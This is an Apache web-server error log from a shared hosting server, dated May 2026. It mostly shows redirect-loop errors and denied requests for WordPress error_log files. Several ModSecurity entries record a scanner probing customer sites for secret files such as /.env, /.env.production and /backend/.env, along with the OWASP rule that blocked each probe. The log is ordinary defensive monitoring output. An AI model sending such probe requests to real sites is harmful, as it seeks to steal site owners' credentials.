[Tue May 12 04:45:46.917330 2026] [core:error] [pid 1825287:tid 1825327] [client 172.190.142.176:32336] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:47.286558 2026] [core:error] [pid 1825179:tid 1825213] [client 172.190.142.176:19924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:47.286582 2026] [core:error] [pid 1825179:tid 1825213] [client 172.190.142.176:19924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:47.720359 2026] [core:error] [pid 1808852:tid 1808862] [client 172.190.142.176:9085] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:47.720396 2026] [core:error] [pid 1808852:tid 1808862] [client 172.190.142.176:9085] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:48.187114 2026] [core:error] [pid 1825287:tid 1825307] [client 172.190.142.176:14303] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:48.187147 2026] [core:error] [pid 1825287:tid 1825307] [client 172.190.142.176:14303] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:48.792184 2026] [core:error] [pid 1820198:tid 1820202] [client 172.190.142.176:32367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:48.792222 2026] [core:error] [pid 1820198:tid 1820202] [client 172.190.142.176:32367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:49.012487 2026] [authz_core:error] [pid 1730175:tid 1730181] [client 176.120.22.46:61033] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/error_log, referer: https://www.maelbailly.fr/wp-includes/rest-api/
[Tue May 12 04:45:49.859366 2026] [core:error] [pid 1730175:tid 1730200] [client 172.190.142.176:14312] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:49.859392 2026] [core:error] [pid 1730175:tid 1730200] [client 172.190.142.176:14312] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:51.131276 2026] [core:error] [pid 1808852:tid 1808875] [client 172.190.142.176:19917] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:51.131311 2026] [core:error] [pid 1808852:tid 1808875] [client 172.190.142.176:19917] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:51.662345 2026] [core:error] [pid 1730175:tid 1730191] [client 172.190.142.176:14283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:51.662379 2026] [core:error] [pid 1730175:tid 1730191] [client 172.190.142.176:14283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.204042 2026] [core:error] [pid 1825287:tid 1825329] [client 172.190.142.176:9086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.204082 2026] [core:error] [pid 1825287:tid 1825329] [client 172.190.142.176:9086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.626915 2026] [core:error] [pid 1825179:tid 1825198] [client 172.190.142.176:55759] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.626943 2026] [core:error] [pid 1825179:tid 1825198] [client 172.190.142.176:55759] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.994428 2026] [core:error] [pid 1820198:tid 1820208] [client 172.190.142.176:9054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:52.994471 2026] [core:error] [pid 1820198:tid 1820208] [client 172.190.142.176:9054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:53.380420 2026] [core:error] [pid 1808852:tid 1808876] [client 172.190.142.176:32377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:53.380452 2026] [core:error] [pid 1808852:tid 1808876] [client 172.190.142.176:32377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:53.793389 2026] [core:error] [pid 1825287:tid 1825304] [client 172.190.142.176:19947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:53.793413 2026] [core:error] [pid 1825287:tid 1825304] [client 172.190.142.176:19947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:54.275417 2026] [core:error] [pid 1825179:tid 1825206] [client 172.190.142.176:32376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:54.275464 2026] [core:error] [pid 1825179:tid 1825206] [client 172.190.142.176:32376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:54.711640 2026] [core:error] [pid 1808852:tid 1808864] [client 172.190.142.176:60758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:54.711673 2026] [core:error] [pid 1808852:tid 1808864] [client 172.190.142.176:60758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:55.166469 2026] [core:error] [pid 1808852:tid 1808874] [client 172.190.142.176:19913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:55.166500 2026] [core:error] [pid 1808852:tid 1808874] [client 172.190.142.176:19913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:55.666091 2026] [core:error] [pid 1730175:tid 1730193] [client 172.190.142.176:14277] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:55.666124 2026] [core:error] [pid 1730175:tid 1730193] [client 172.190.142.176:14277] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.048119 2026] [core:error] [pid 1825179:tid 1825210] [client 172.190.142.176:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.048156 2026] [core:error] [pid 1825179:tid 1825210] [client 172.190.142.176:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.485429 2026] [core:error] [pid 1820198:tid 1820204] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.485462 2026] [core:error] [pid 1820198:tid 1820204] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.902303 2026] [core:error] [pid 1825287:tid 1825310] [client 172.190.142.176:19929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:56.902327 2026] [core:error] [pid 1825287:tid 1825310] [client 172.190.142.176:19929] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:57.279754 2026] [core:error] [pid 1730207:tid 1730209] [client 172.190.142.176:32358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:57.279792 2026] [core:error] [pid 1730207:tid 1730209] [client 172.190.142.176:32358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:45:57.504053 2026] [authz_core:error] [pid 1825179:tid 1825215] [client 176.120.22.46:50698] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/endpoints/error_log, referer: https://www.maelbailly.fr/wp-includes/rest-api/endpoints/
[Tue May 12 04:46:01.577613 2026] [security2:error] [pid 1820198:tid 1820214] [client 43.163.85.226:56230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/"] [unique_id "agKUac1tk6y7yBJLpJorjwAAAI4"], referer: http://www.piregwan-genesis.com
[Tue May 12 04:46:03.873562 2026] [authz_core:error] [pid 1825179:tid 1825218] [client 176.120.22.46:54858] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/fields/error_log, referer: https://www.maelbailly.fr/wp-includes/rest-api/fields/
[Tue May 12 04:46:05.396818 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/.env"] [unique_id "agKUbRfeipD4uoG21Foj7AAAABg"]
[Tue May 12 04:46:05.397109 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/.env"] [unique_id "agKUbRfeipD4uoG21Foj7AAAABg"]
[Tue May 12 04:46:05.397349 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/.env"] [unique_id "agKUbRfeipD4uoG21Foj7AAAABg"]
[Tue May 12 04:46:05.503247 2026] [security2:error] [pid 1730175:tid 1730190] [client 208.84.100.109:21052] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/api/.env"] [unique_id "agKUbXo6NvB9WXx5V-6gigAAAQ0"]
[Tue May 12 04:46:05.503456 2026] [security2:error] [pid 1730175:tid 1730190] [client 208.84.100.109:21052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/api/.env"] [unique_id "agKUbXo6NvB9WXx5V-6gigAAAQ0"]
[Tue May 12 04:46:05.503696 2026] [security2:error] [pid 1730175:tid 1730190] [client 208.84.100.109:21052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/api/.env"] [unique_id "agKUbXo6NvB9WXx5V-6gigAAAQ0"]
[Tue May 12 04:46:05.512054 2026] [security2:error] [pid 1730207:tid 1730221] [client 208.84.100.109:21026] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/.env.local"] [unique_id "agKUbTue9Sp-pIv_Bb623QAAAUw"]
[Tue May 12 04:46:05.512214 2026] [security2:error] [pid 1730207:tid 1730221] [client 208.84.100.109:21026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/.env.local"] [unique_id "agKUbTue9Sp-pIv_Bb623QAAAUw"]
[Tue May 12 04:46:05.512424 2026] [security2:error] [pid 1730207:tid 1730221] [client 208.84.100.109:21026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/.env.local"] [unique_id "agKUbTue9Sp-pIv_Bb623QAAAUw"]
[Tue May 12 04:46:05.515380 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/.env.production"] [unique_id "agKUbRfeipD4uoG21Foj7QAAABg"]
[Tue May 12 04:46:05.515600 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/.env.production"] [unique_id "agKUbRfeipD4uoG21Foj7QAAABg"]
[Tue May 12 04:46:05.515821 2026] [security2:error] [pid 1808852:tid 1808879] [client 208.84.100.109:21008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/.env.production"] [unique_id "agKUbRfeipD4uoG21Foj7QAAABg"]
[Tue May 12 04:46:05.516195 2026] [security2:error] [pid 1825179:tid 1825203] [client 208.84.100.109:21022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agKUbdr1yOh9TvizeziRRwAAAEU"]
[Tue May 12 04:46:05.516235 2026] [security2:error] [pid 1825287:tid 1825320] [client 208.84.100.109:21072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/backend/.env"] [unique_id "agKUbQgpmE1yW0glLdggoQAAAM8"]
[Tue May 12 04:46:05.516354 2026] [security2:error] [pid 1825179:tid 1825203] [client 208.84.100.109:21022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agKUbdr1yOh9TvizeziRRwAAAEU"]
[Tue May 12 04:46:05.516394 2026] [security2:error] [pid 1825287:tid 1825320] [client 208.84.100.109:21072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/backend/.env"] [unique_id "agKUbQgpmE1yW0glLdggoQAAAM8"]
[Tue May 12 04:46:05.516567 2026] [security2:error] [pid 1825179:tid 1825203] [client 208.84.100.109:21022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agKUbdr1yOh9TvizeziRRwAAAEU"]
[Tue May 12 04:46:05.516607 2026] [security2:error] [pid 1825287:tid 1825320] [client 208.84.100.109:21072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/backend/.env"] [unique_id "agKUbQgpmE1yW0glLdggoQAAAM8"]
[Tue May 12 04:46:10.206320 2026] [authz_core:error] [pid 1820198:tid 1820200] [client 176.120.22.46:49941] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/search/error_log, referer: https://www.maelbailly.fr/wp-includes/rest-api/search/
[Tue May 12 04:46:20.546302 2026] [authz_core:error] [pid 1730175:tid 1730189] [client 17.22.253.88:39244] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/library/error_log
[Tue May 12 04:46:23.244309 2026] [authz_core:error] [pid 1825287:tid 1825310] [client 176.120.22.46:60227] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sitemaps/providers/error_log, referer: https://www.maelbailly.fr/wp-includes/sitemaps/providers/
[Tue May 12 04:46:35.986518 2026] [authz_core:error] [pid 1730207:tid 1730224] [client 176.120.22.46:54988] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/lib/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/lib/
[Tue May 12 04:46:42.431693 2026] [authz_core:error] [pid 1825287:tid 1825316] [client 176.120.22.46:60971] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/namespaced/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/namespaced/
[Tue May 12 04:46:48.963411 2026] [authz_core:error] [pid 1825179:tid 1825214] [client 176.120.22.46:50534] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/namespaced/Core/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/namespaced/Core/
[Tue May 12 04:46:55.363801 2026] [authz_core:error] [pid 1730207:tid 1730211] [client 176.120.22.46:57227] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/src/
[Tue May 12 04:46:55.655135 2026] [:error] [pid 1825287:tid 1825305] [client 114.119.140.137:38715] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&systpl=six&language=chinese
[Tue May 12 04:47:01.763179 2026] [authz_core:error] [pid 1808852:tid 1808864] [client 176.120.22.46:63449] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/Core/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/src/Core/
[Tue May 12 04:47:08.123643 2026] [authz_core:error] [pid 1730207:tid 1730228] [client 176.120.22.46:53106] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/Core32/error_log, referer: https://www.maelbailly.fr/wp-includes/sodium_compat/src/Core32/
[Tue May 12 04:47:17.535179 2026] [security2:error] [pid 1825287:tid 1825321] [client 43.134.40.189:34722] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/wp/v2/pages/47"] [unique_id "agKUtQgpmE1yW0glLdgg2wAAANA"]
[Tue May 12 04:47:27.473716 2026] [authz_core:error] [pid 1820198:tid 1820204] [client 176.120.22.46:52729] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/theme-compat/error_log, referer: https://www.maelbailly.fr/wp-includes/theme-compat/
[Tue May 12 04:47:33.783474 2026] [authz_core:error] [pid 1825287:tid 1825313] [client 176.120.22.46:58494] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/widgets/error_log, referer: https://www.maelbailly.fr/wp-includes/widgets/
